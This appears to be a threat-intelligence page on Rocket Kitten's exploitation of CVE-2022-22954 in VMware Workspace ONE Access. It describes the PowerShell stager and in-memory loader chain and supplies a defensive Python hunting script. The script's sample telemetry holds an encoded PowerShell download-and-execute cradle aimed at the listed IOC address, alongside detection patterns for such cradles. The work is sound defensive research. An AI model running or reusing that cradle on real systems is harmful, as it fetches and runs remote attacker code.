The Shadow of Rocket Kitten: Exploring a Sophisticated VMware Exploit
- Actor Motivations: Exfiltration
- Attack Vectors: Code Injection, Vulnerability Exploitation, Zero-Day Attack, Backdoor, Downloader
- Attack Complexity: Medium
- Threat Risk: High Impact/High Probability
Threat Overview
Morphisec identified in-the-wild exploitation of CVE-2022-22954, a server-side template injection vulnerability in VMware Workspace ONE Access and Identity Manager, believed to be the work of an APT group, most likely the Iranian-linked Rocket Kitten. The injected template caused the Tomcat service process (prunsrv.exe) to launch PowerShell, giving the attacker unauthenticated remote code execution on the appliance. A PowerShell stager then downloaded the PowerTrash Loader, which loaded the final payload, a Core Impact agent, directly into memory. The same chain can be used to deploy ransomware or coin miners, and its in-memory execution is designed to evade antivirus and endpoint detection and response (EDR) tools.
Exploited Vulnerabilities
- CVE-2022-22954 (server-side template injection in VMware Workspace ONE Access and Identity Manager)
Extracted IOCs
- 185[.]117.90.187
FAQs
VMware Workspace ONE Access Vulnerability (CVE-2022-22954) FAQ
Attackers are actively exploiting CVE-2022-22954, a server-side template injection vulnerability in VMware Workspace ONE Access. By sending a crafted template expression that the server evaluates, an unauthenticated attacker can run arbitrary commands on the hosting server and take control of it.
Cybersecurity researchers believe advanced persistent threat (APT) groups—highly skilled, often state-sponsored hacking teams—are responsible. The specific methods and advanced tools used in this campaign share strong similarities with Rocket Kitten, an APT group linked to Iran.
The primary goal of the attack is to establish a hidden foothold within a corporate network. Once inside, the attackers can deploy ransomware, install cryptocurrency miners, or establish backdoors that allow them to continuously monitor and control the network while evading security software.
The attacks do not appear to single out a specific industry; rather, they target the technology itself. The attackers are going after organizations utilizing unpatched versions of VMware Workspace ONE Access and Identity Manager, which are critical systems used for managing employee logins and secure access to corporate applications.
The attackers exploit the template-injection flaw to make the Tomcat service run an encoded PowerShell command. That command is a stager: it downloads a large, heavily obfuscated PowerShell script (the PowerTrash Loader) that reflectively loads the Core Impact agent, a commercial remote-access and post-exploitation tool, directly into process memory, so the agent itself is never written to disk.
VMware Identity Manager handles single sign-on and multi-factor authentication for an organization's most sensitive applications. Compromising this system is like stealing the master key to a building; it provides attackers with broad, privileged access to a company's wider network and data.
Organizations should immediately apply the patches VMware has released for these vulnerabilities. Security teams should also hunt for signs of compromise on the appliances themselves: PowerShell or other shells launched by the Tomcat service process (prunsrv.exe), encoded PowerShell command lines, and tools that exist only in memory rather than on disk.
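As an added illustration of that hunt (this is example code written for this page, not Morphisec's tooling or anything from the original report), the following Python script applies the two indicators described above to Sysmon-style process-creation records: a shell spawned by prunsrv.exe, and an encoded PowerShell command that, once decoded, contains a download cradle or reaches out to the IOC listed on this page. The records, field names and the stager URL path (/stager) are constructed stand-ins, not captured telemetry.

```python
"""Hunt for the CVE-2022-22954 post-exploitation pattern in process-creation logs.

Example code for this page, not from the original report. Records are
constructed, Sysmon-style (ParentImage / Image / CommandLine) stand-ins.
"""
import base64
import ntpath
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

KNOWN_C2 = {"185.117.90.187"}                      # IOC from this page
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
TOMCAT_SERVICE = "prunsrv.exe"                     # Workspace ONE Access Tomcat wrapper
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|iwr\b|IEX\b|Invoke-Expression", re.I)
# powershell accepts -e, -ec, -en, -enc ... -EncodedCommand; require whitespace then base64
ENC_RE = re.compile(r"[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"`;)<>]+")


@dataclass
class Finding:
    record_id: int
    reasons: list[str] = field(default_factory=list)
    decoded_command: str = ""
    urls: list[str] = field(default_factory=list)


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none / it is not valid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def hunt(records: list[dict]) -> list[Finding]:
    """Flag records matching the prunsrv.exe -> shell chain or a malicious encoded command."""
    findings = []
    for rec in records:
        f = Finding(rec["RecordId"])
        parent = ntpath.basename(rec["ParentImage"]).lower()
        child = ntpath.basename(rec["Image"]).lower()
        if parent == TOMCAT_SERVICE and child in SHELLS:
            f.reasons.append(f"{child} spawned by Tomcat service process ({TOMCAT_SERVICE})")
        decoded = decode_encoded_command(rec["CommandLine"])
        if decoded is not None:
            f.decoded_command = decoded
            f.urls = URL_RE.findall(decoded)
            if CRADLE_RE.search(decoded):
                f.reasons.append("encoded PowerShell command contains a download cradle")
            hits = sorted({urlsplit(u).hostname for u in f.urls} & KNOWN_C2)
            if hits:
                f.reasons.append("contacts known IOC: " + ", ".join(hits))
        if f.reasons:
            findings.append(f)
    return findings


# Constructed sample telemetry: 1 and 2 are benign, 3 and 4 mirror the described chain.
SAMPLE_RECORDS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + encode_command("Get-Service | Where-Object Status -eq Running")},
    {"RecordId": 3, "ParentImage": r"C:\VMware\vIDM\tomcat\bin\prunsrv.exe",  # stand-in path
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ec " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://185.117.90.187/stager')")},
    {"RecordId": 4, "ParentImage": r"C:\VMware\vIDM\tomcat\bin\prunsrv.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_RECORDS):
        print(f"record {f.record_id}: {'; '.join(f.reasons)}")
        if f.decoded_command:
            print("  decoded:", f.decoded_command)
```

Record 2 shows why the encoded-command rule alone is too noisy on administrative hosts: it is decoded but not flagged because it carries neither a download cradle nor a known host. Record 4 shows the opposite: the parent-child relation fires even when nothing is encoded, which is the rule worth alerting on for an appliance whose Tomcat process should never be spawning a shell.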
This is a widespread and active threat. Because the vulnerability can be exploited without any credentials, attackers weaponized it quickly and are scanning the internet for any unpatched server they can reach.